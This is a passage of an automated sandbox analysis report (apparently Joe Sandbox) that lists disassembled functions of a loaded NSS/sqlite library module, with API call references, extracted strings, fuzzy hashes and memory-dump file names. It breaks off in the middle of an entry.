Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: f16d2e4d2afd0720a5ed5b2cc538dd2f56fbea2d0fa614ec11a7b4f6c26da773
Instruction ID: 4d2c144907b187eeeac4eaba3f470f6bc5e76fc1424a3f9df53ef8ff48c1958d
Opcode Fuzzy Hash: f16d2e4d2afd0720a5ed5b2cc538dd2f56fbea2d0fa614ec11a7b4f6c26da773
Instruction Fuzzy Hash: C65145B5A006019BEB119F24EC45AAB37B6FF0631CF144535EC2A82A11F771D916CBDA

Function 6C69ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C69ACE2
malloc.MOZGLUE(00000001), ref: 6C69ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C69AD02
TlsGetValue.KERNEL32 ref: 6C69AD3C
calloc.MOZGLUE(00000001,?), ref: 6C69AD8C
PR_Unlock.NSS3 ref: 6C69ADC0
free.MOZGLUE(00000000), ref: 6C69AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C69AE58
free.MOZGLUE(00000000), ref: 6C69AE69
free.MOZGLUE(?), ref: 6C69AE78
PR_Unlock.NSS3 ref: 6C69AE8C
free.MOZGLUE(?), ref: 6C69AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C69AEC7

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 86ea177fd5337e232e19dc16715ac844f092b316176ef45937cc42ce26687136
Instruction ID: 8ea47cf6d93e095b29b90e9b81267e2c144116423f27adf803b40cf46f11e1a4
Opcode Fuzzy Hash: 86ea177fd5337e232e19dc16715ac844f092b316176ef45937cc42ce26687136
Instruction Fuzzy Hash: 78519DB0F002168BDB10DFA8DC856AE77F4BB0635DF184139D824A7B12D731A919CBDA

Function 6C774C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C774CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C774CFD
sqlite3_value_text16.NSS3(?), ref: 6C774D44

Strings

API call with %s database connection pointer, xrefs: 6C774CF6
out of memory, xrefs: 6C774C78, 6C774C9E
invalid, xrefs: 6C774CF1
bad parameter or other API misuse, xrefs: 6C774D05
no more rows available, xrefs: 6C774D2E
abort due to ROLLBACK, xrefs: 6C774D27, 6C774D33
unknown error, xrefs: 6C774D56
another row available, xrefs: 6C774D20

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 9b34a950ae40e2bab8dd8328b59ced10649d4a2fcacb7528fbc21d5d43b9dd60
Instruction ID: 571fdb85ea270d876e66f62ef20459deb525070d776876e691af14c6c843c6d0
Opcode Fuzzy Hash: 9b34a950ae40e2bab8dd8328b59ced10649d4a2fcacb7528fbc21d5d43b9dd60
Instruction Fuzzy Hash: 9A316673F04819A7DF380A24AB027A5B3667783318F150539D5645BE19CB60AC11EFF6

Function 6C6D2CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C6D2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C6D2D07

Part of subcall function 6C7B09D0: PR_Now.NSS3 ref: 6C7B0A22
Part of subcall function 6C7B09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C7B0A35
Part of subcall function 6C7B09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C7B0A66
Part of subcall function 6C7B09D0: PR_GetCurrentThread.NSS3 ref: 6C7B0A70
Part of subcall function 6C7B09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C7B0A9D
Part of subcall function 6C7B09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C7B0AC8
Part of subcall function 6C7B09D0: PR_vsmprintf.NSS3(?,?), ref: 6C7B0AE8
Part of subcall function 6C7B09D0: EnterCriticalSection.KERNEL32(?), ref: 6C7B0B19
Part of subcall function 6C7B09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C7B0B48
Part of subcall function 6C7B09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C7B0C76
Part of subcall function 6C7B09D0: PR_LogFlush.NSS3 ref: 6C7B0C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C6D2D22

Part of subcall function 6C7B09D0: OutputDebugStringA.KERNEL32(?), ref: 6C7B0B88
Part of subcall function 6C7B09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7B0C5D
Part of subcall function 6C7B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C7B0C8D
Part of subcall function 6C7B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0C9C
Part of subcall function 6C7B09D0: OutputDebugStringA.KERNEL32(?), ref: 6C7B0CD1
Part of subcall function 6C7B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C7B0CEC
Part of subcall function 6C7B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0CFB
Part of subcall function 6C7B09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C7B0D16
Part of subcall function 6C7B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C7B0D26
Part of subcall function 6C7B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0D35
Part of subcall function 6C7B09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C7B0D65
Part of subcall function 6C7B09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C7B0D70
Part of subcall function 6C7B09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C7B0D90
Part of subcall function 6C7B09D0: free.MOZGLUE(00000000), ref: 6C7B0D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C6D2D3B

Part of subcall function 6C7B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C7B0BAB
Part of subcall function 6C7B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0BBA
Part of subcall function 6C7B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C6D2D54

Part of subcall function 6C7B09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B0BCB
Part of subcall function 6C7B09D0: EnterCriticalSection.KERNEL32(?), ref: 6C7B0BDE
Part of subcall function 6C7B09D0: OutputDebugStringA.KERNEL32(?), ref: 6C7B0C16

Strings

n{l, xrefs: 6C6D2D6C, 6C6D2D9A
pLabel = 0x%p, xrefs: 6C6D2D4F
slotID = 0x%x, xrefs: 6C6D2D02
C_InitToken, xrefs: 6C6D2CE7
pPin = 0x%p, xrefs: 6C6D2D1D
ulPinLen = %d, xrefs: 6C6D2D36

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$n{l
API String ID: 420000887-2879250248
Opcode ID: 52d038a82d22cc9a799cb8ccd9b9727076756a568cae32bed9390d00c8dce220
Instruction ID: 3f357b0950676b1526413356523d8d8d3b28ed1588c67c34e369a50912563282
Opcode Fuzzy Hash: 52d038a82d22cc9a799cb8ccd9b9727076756a568cae32bed9390d00c8dce220
Instruction Fuzzy Hash: FC21C175300145AFEB109F54DE8CA993BB1EB8331EF458128E508A3622CB75AD48CBE6

Function 6C6A4880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A48A2
PORT_NewArena_Util.NSS3(00000800), ref: 6C6A48C4
PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6C6A48D8
memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6C6A48FB
PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6C6A4908
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C6A4947
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C6A496C
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6A4988
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7C8DAC,?), ref: 6C6A49DE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A49FD
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6A4ACB

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
String ID:
API String ID: 4201528089-0
Opcode ID: 11be430ff738cbf0cd4b3d6771982ee565986fede901cec925aef49b29c9eafb
Instruction ID: 326a15329d20b903da8abe0bc5581f8c548c96df71f6b8d91f75da40f7923cad
Opcode Fuzzy Hash: 11be430ff738cbf0cd4b3d6771982ee565986fede901cec925aef49b29c9eafb
Instruction Fuzzy Hash: 0C510471A003018BEB108FA5DD457AB77E4AF4130CF145028EA19AAB85EFF2DC16CB5E

Function 6C772D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C772D9F

Part of subcall function 6C62CA30: EnterCriticalSection.KERNEL32(?,?,?,6C68F9C9,?,6C68F4DA,6C68F9C9,?,?,6C65369A), ref: 6C62CA7A
Part of subcall function 6C62CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C62CB26

sqlite3_exec.NSS3(?,?,6C772F70,?,?), ref: 6C772DF9
sqlite3_free.NSS3(00000000), ref: 6C772E2C
sqlite3_free.NSS3(?), ref: 6C772E3A
sqlite3_free.NSS3(?), ref: 6C772E52
sqlite3_mprintf.NSS3(6C7DAAF9,?), ref: 6C772E62
sqlite3_free.NSS3(?), ref: 6C772E70
sqlite3_free.NSS3(?), ref: 6C772E89
sqlite3_free.NSS3(?), ref: 6C772EBB
sqlite3_free.NSS3(?), ref: 6C772ECB
sqlite3_free.NSS3(00000000), ref: 6C772F3E
sqlite3_free.NSS3(?), ref: 6C772F4C

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 16eb43b1ffa93ff23d1c2286610b95e1574d24846475b9503916b9b2fc1dc1b8
Instruction ID: a875a3b09fbc4b4da319e2340d356d13669a590cd515e85dd39d1412f97482ba
Opcode Fuzzy Hash: 16eb43b1ffa93ff23d1c2286610b95e1574d24846475b9503916b9b2fc1dc1b8
Instruction Fuzzy Hash: DD619DB5E00209CBEF10CF68D989B9EB7B5AF89358F140038EC65A7701E775E845CBA5

Function 6C624C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624CB0
PR_Unlock.NSS3(?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624D97
PR_Lock.NSS3(?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624DBA
PR_WaitCondVar.NSS3 ref: 6C624DD4
PR_Unlock.NSS3(?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624DEF

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 7e4a1ce4aaf67847aa55eff3ff0110d4f5d9dfffc7b194f7cba20d1d65a2a9c1
Instruction ID: b1803de2352791ba52ecd793a48577196ef3a0d5d95a87144b7d9978a828d101
Opcode Fuzzy Hash: 7e4a1ce4aaf67847aa55eff3ff0110d4f5d9dfffc7b194f7cba20d1d65a2a9c1
Instruction Fuzzy Hash: A0415DB5A08615CFCB10AF78D48856977F4BF06328F058A69D8989BB01E774D885CFC9

Function 6C6C8F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C6C8FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C6C8FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C6C8FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C6C9013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C6C9042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C6C905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C6C9073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C6C90EC

Part of subcall function 6C690F00: PR_GetPageSize.NSS3(6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F1B
Part of subcall function 6C690F00: PR_NewLogModule.NSS3(clock,6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C6C9111

Strings

n{l, xrefs: 6C6C90A3

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID: n{l
API String ID: 2831689957-702554438
Opcode ID: 06d546719e2c08d03d52bb5095aa82025f69b520571c4b824ed79f484a90be40
Instruction ID: 3066576c854544daccd871f3fa80cefa0230c0e365f31d82781354bc2692212a
Opcode Fuzzy Hash: 06d546719e2c08d03d52bb5095aa82025f69b520571c4b824ed79f484a90be40
Instruction Fuzzy Hash: 60517775B046058FCB10AF38C488299BBF4EF4A31CF05456ADC549BB16EB34E884CB9A

Function 6C6AE910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149memorystringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C6AE93B
PR_SetError.NSS3(FFFFE075,00000000), ref: 6C6AE94E
PORT_Alloc_Util.NSS3(00000001), ref: 6C6AE995
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6AE9A7
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6C6AE9CA
PORT_Strdup_Util.NSS3(6C7E933E), ref: 6C6AEA17
PORT_Alloc_Util.NSS3(00000001), ref: 6C6AEA28

Part of subcall function 6C700BE0: malloc.MOZGLUE(6C6F8D2D,?,00000000,?), ref: 6C700BF8
Part of subcall function 6C700BE0: TlsGetValue.KERNEL32(6C6F8D2D,?,00000000,?), ref: 6C700C15

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6AEA3C
free.MOZGLUE(?), ref: 6C6AEA69

Strings

http://, xrefs: 6C6AE935

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
String ID: http://
API String ID: 3982757857-1121587658
Opcode ID: b4fd07816332357c9cb35d696bad5f7ae56b7083556a9dcc1eb6b6fe39c6d703
Instruction ID: b8d23a083a8501dcbe2be853738c4f5904b87cf5ab8c5fae33e6ab8291592cc0
Opcode Fuzzy Hash: b4fd07816332357c9cb35d696bad5f7ae56b7083556a9dcc1eb6b6fe39c6d703
Instruction Fuzzy Hash: 7641AC7594470A4BEF608AE88C807EA77A5AF1731CF140061EDA497F41E2229D77C3EE

Function 6C6C4E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6C4E90
EnterCriticalSection.KERNEL32 ref: 6C6C4EA9
TlsGetValue.KERNEL32 ref: 6C6C4EC6
EnterCriticalSection.KERNEL32 ref: 6C6C4EDF
PL_HashTableLookup.NSS3 ref: 6C6C4EF8
PR_Unlock.NSS3 ref: 6C6C4F05
PR_Now.NSS3 ref: 6C6C4F13
PR_Unlock.NSS3 ref: 6C6C4F3A

Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907AD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907CD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907D6
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C62204A), ref: 6C6907E4
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,6C62204A), ref: 6C690864
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C690880
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,6C62204A), ref: 6C6908CB
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908D7
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908FB

Strings

bUll, xrefs: 6C6C4F3F
bUll, xrefs: 6C6C4E5C

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bUll$bUll
API String ID: 326028414-4163893841
Opcode ID: a03015ad4bb8038d4c4fdc2df7cb72353ea4301aae08a3866302994863db7223
Instruction ID: 68be7ac976d58ee236e2d881a84a6d23f446a5fe817034e637535f27478281c0
Opcode Fuzzy Hash: a03015ad4bb8038d4c4fdc2df7cb72353ea4301aae08a3866302994863db7223
Instruction Fuzzy Hash: FF415CB4A006059FCB00EF78D5848AABBF4FF49354B118569EC999B710EB30E855CFD6

Function 6C6D6C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C6D6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6D6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D6CA3

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6D6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C6D6CD5

Strings

n{l, xrefs: 6C6D6CF4, 6C6D6D1F
pMechanism = 0x%p, xrefs: 6C6D6CD0
hSession = 0x%x, xrefs: 6C6D6C7E, 6C6D6C8E
(CK_INVALID_HANDLE), xrefs: 6C6D6C9C
C_DigestInit, xrefs: 6C6D6C61

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$n{l
API String ID: 1003633598-3085161416
Opcode ID: d6a83392b32eefe855c92d02bd2f23aad72ee9bfce8b700b10357a1fc50c3544
Instruction ID: b775dbced369d4df553704818ac87cda75b76885d41a70f788a0a71c88b0bb38
Opcode Fuzzy Hash: d6a83392b32eefe855c92d02bd2f23aad72ee9bfce8b700b10357a1fc50c3544
Instruction Fuzzy Hash: F621E171B011159BDB109F54EE8CB9A3BB5EB4631DF064439E809A7A12DB34F908CBDA

Function 6C6EECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

